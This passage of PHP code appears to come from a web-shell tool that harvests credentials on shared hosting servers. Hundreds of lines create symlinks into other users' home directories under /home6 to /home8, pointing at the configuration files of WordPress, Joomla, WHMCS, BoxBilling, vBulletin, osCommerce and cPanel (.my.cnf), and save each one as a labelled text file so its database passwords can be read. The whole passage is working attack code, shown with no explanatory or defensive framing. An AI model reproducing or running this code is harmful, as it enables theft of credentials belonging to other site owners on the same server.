  1991. @symlink('/home6/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1992. @symlink('/home6/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1993. @symlink('/home6/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1994. @symlink('/home6/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1995. @symlink('/home6/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1996. @symlink('/home6/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1997. @symlink('/home6/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1998. @symlink('/home6/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1999. @symlink('/home6/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2000. @symlink('/home6/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2001. @symlink('/home6/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2002. @symlink('/home6/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2003. @symlink('/home6/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2004. @symlink('/home6/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2005. @symlink('/home6/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2006. @symlink('/home6/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2007. @symlink('/home6/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2008. @symlink('/home6/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2009. @symlink('/home6/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2010. @symlink('/home6/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2011. @symlink('/home6/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2012. @symlink('/home6/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2013. @symlink('/home6/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2014. @symlink('/home6/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2015. @symlink('/home6/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2016. @symlink('/home6/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2017. @symlink('/home6/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2018. @symlink('/home6/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2019. @symlink('/home6/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2020. @symlink('/home6/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2021. @symlink('/home6/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2022. @symlink('/home6/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2023. @symlink('/home6/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2024. @symlink('/home6/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2025. @symlink('/home6/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2026. @symlink('/home6/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2027. @symlink('/home6/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2028. @symlink('/home6/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2029. @symlink('/home6/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2030. @symlink('/home6/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2031. @symlink('/home6/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2032. @symlink('/home6/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2033. @symlink('/home6/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2034. @symlink('/home6/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2035. @symlink('/home6/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2036. @symlink('/home6/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2037. @symlink('/home6/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2038. @symlink('/home6/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2039. @symlink('/home6/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2040. @symlink('/home6/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2041. @symlink('/home6/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2042. @symlink('/home6/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2043. @symlink('/home6/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2044. @symlink('/home6/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2045. @symlink('/home6/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2046. @symlink('/home6/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2047. @symlink('/home6/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2048. @symlink('/home6/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2049. @symlink('/home6/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2050. @symlink('/home6/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2051. @symlink('/home6/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2052. @symlink('/home6/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2053. @symlink('/home6/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2054. @symlink('/home6/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2055.  
  2056. //home 7
  2057.  
  2058. @symlink('/home7/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2059. @symlink('/home7/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2060. @symlink('/home7/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2061. @symlink('/home7/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2062. @symlink('/home7/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2063. @symlink('/home7/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2064. @symlink('/home7/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2065. @symlink('/home7/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2066. @symlink('/home7/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2067. @symlink('/home7/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2068. @symlink('/home7/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2069. @symlink('/home7/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2070. @symlink('/home7/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2071. @symlink('/home7/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2072. @symlink('/home7/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2073. @symlink('/home7/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2074. @symlink('/home7/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2075. @symlink('/home7/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2076. @symlink('/home7/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2077. @symlink('/home7/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2078. @symlink('/home7/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2079. @symlink('/home7/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2080. @symlink('/home7/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2081. @symlink('/home7/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2082. @symlink('/home7/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2083. @symlink('/home7/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2084. @symlink('/home7/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2085. @symlink('/home7/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2086. @symlink('/home7/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2087. @symlink('/home7/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2088. @symlink('/home7/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2089. @symlink('/home7/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2090. @symlink('/home7/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2091. @symlink('/home7/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2092. @symlink('/home7/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2093. @symlink('/home7/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2094. @symlink('/home7/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2095. @symlink('/home7/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2096. @symlink('/home7/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2097. @symlink('/home7/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2098. @symlink('/home7/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2099. @symlink('/home7/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2100. @symlink('/home7/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2101. @symlink('/home7/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2102. @symlink('/home7/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2103. @symlink('/home7/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2104. @symlink('/home7/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2105. @symlink('/home7/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2106. @symlink('/home7/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2107. @symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2108. @symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2109. @symlink('/home7/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2110. @symlink('/home7/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2111. @symlink('/home7/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2112. @symlink('/home7/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2113. @symlink('/home7/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2114. @symlink('/home7/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2115. @symlink('/home7/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2116. @symlink('/home7/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2117. @symlink('/home7/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2118. @symlink('/home7/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2119. @symlink('/home7/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2120. @symlink('/home7/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2121. @symlink('/home7/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2122. @symlink('/home7/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2123. @symlink('/home7/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2124. @symlink('/home7/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2125. @symlink('/home7/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2126. @symlink('/home7/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2127. @symlink('/home7/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2128. @symlink('/home7/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2129. @symlink('/home7/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2130. @symlink('/home7/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2131. @symlink('/home7/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2132. @symlink('/home7/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2133. @symlink('/home7/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2134. @symlink('/home7/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2135. @symlink('/home7/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2136. @symlink('/home7/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2137. @symlink('/home7/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2138. @symlink('/home7/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2139. @symlink('/home7/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2140. @symlink('/home7/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2141. @symlink('/home7/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2142. @symlink('/home7/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2143. @symlink('/home7/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2144. @symlink('/home7/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2145. @symlink('/home7/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2146. @symlink('/home7/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2147. @symlink('/home7/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2148. @symlink('/home7/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2149. @symlink('/home7/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2150. @symlink('/home7/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2151. @symlink('/home7/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2152. @symlink('/home7/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2153. @symlink('/home7/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2154. @symlink('/home7/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2155. @symlink('/home7/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2156. @symlink('/home7/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2157. @symlink('/home7/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2158. @symlink('/home7/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2159. @symlink('/home7/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2160. @symlink('/home7/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2161. @symlink('/home7/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2162. @symlink('/home7/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2163. @symlink('/home7/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2164. @symlink('/home7/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2165. @symlink('/home7/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2166. @symlink('/home7/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2167. @symlink('/home7/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2168. @symlink('/home7/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2169. @symlink('/home7/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2170. @symlink('/home7/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2171. @symlink('/home7/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2172. @symlink('/home7/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2173. @symlink('/home7/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2174. @symlink('/home7/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2175. @symlink('/home7/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2176. @symlink('/home7/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2177. @symlink('/home7/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2178. @symlink('/home7/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2179. @symlink('/home7/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2180. @symlink('/home7/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2181. @symlink('/home7/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2182. @symlink('/home7/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2183. @symlink('/home7/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2184. @symlink('/home7/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2185. @symlink('/home7/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2186. @symlink('/home7/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2187. @symlink('/home7/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2188. @symlink('/home7/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2189. @symlink('/home7/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2190. @symlink('/home7/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2191. @symlink('/home7/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2192. @symlink('/home7/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2193. @symlink('/home7/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2194. @symlink('/home7/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2195. @symlink('/home7/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2196. @symlink('/home7/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2197. @symlink('/home7/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2198. @symlink('/home7/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2199. @symlink('/home7/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2200. @symlink('/home7/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2201. @symlink('/home7/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2202. @symlink('/home7/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2203. @symlink('/home7/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2204. @symlink('/home7/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2205. @symlink('/home7/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2206. @symlink('/home7/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2207. @symlink('/home7/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2208. @symlink('/home7/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2209. @symlink('/home7/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2210. @symlink('/home7/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2211. @symlink('/home7/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2212. @symlink('/home7/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2213. @symlink('/home7/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2214. @symlink('/home7/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2215. @symlink('/home7/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2216. @symlink('/home7/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2217. @symlink('/home7/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2218. @symlink('/home7/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2219. @symlink('/home7/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2220. @symlink('/home7/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2221. @symlink('/home7/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2222. @symlink('/home7/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2223. @symlink('/home7/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2224. @symlink('/home7/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2225. @symlink('/home7/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2226. @symlink('/home7/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2227. @symlink('/home7/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2228. @symlink('/home7/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2229. @symlink('/home7/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2230. @symlink('/home7/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2231. @symlink('/home7/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2232. @symlink('/home7/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2233. @symlink('/home7/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2234. @symlink('/home7/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2235. @symlink('/home7/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2236. @symlink('/home7/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2237. @symlink('/home7/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2238. @symlink('/home7/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2239. @symlink('/home7/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2240.  
  2241. //home 8
  2242.  
  2243. @symlink('/home8/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2244. @symlink('/home8/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2245. @symlink('/home8/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2246. @symlink('/home8/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2247. @symlink('/home8/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2248. @symlink('/home8/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2249. @symlink('/home8/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2250. @symlink('/home8/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2251. @symlink('/home8/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2252. @symlink('/home8/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2253. @symlink('/home8/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2254. @symlink('/home8/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2255. @symlink('/home8/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2256. @symlink('/home8/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2257. @symlink('/home8/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2258. @symlink('/home8/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2259. @symlink('/home8/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2260. @symlink('/home8/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2261. @symlink('/home8/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2262. @symlink('/home8/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2263. @symlink('/home8/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2264. @symlink('/home8/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2265. @symlink('/home8/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2266. @symlink('/home8/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2267. @symlink('/home8/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2268. @symlink('/home8/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2269. @symlink('/home8/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2270. @symlink('/home8/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2271. @symlink('/home8/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2272. @symlink('/home8/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2273. @symlink('/home8/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2274. @symlink('/home8/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2275. @symlink('/home8/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2276. @symlink('/home8/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2277. @symlink('/home8/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2278. @symlink('/home8/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2279. @symlink('/home8/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2280. @symlink('/home8/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2281. @symlink('/home8/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2282. @symlink('/home8/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2283. @symlink('/home8/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2284. @symlink('/home8/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2285. @symlink('/home8/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2286. @symlink('/home8/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2287. @symlink('/home8/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2288. @symlink('/home8/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2289. @symlink('/home8/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2290. @symlink('/home8/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2291. @symlink('/home8/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2292. @symlink('/home8/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2293. @symlink('/home8/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2294. @symlink('/home8/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2295. @symlink('/home8/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2296. @symlink('/home8/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2297. @symlink('/home8/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2298. @symlink('/home8/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
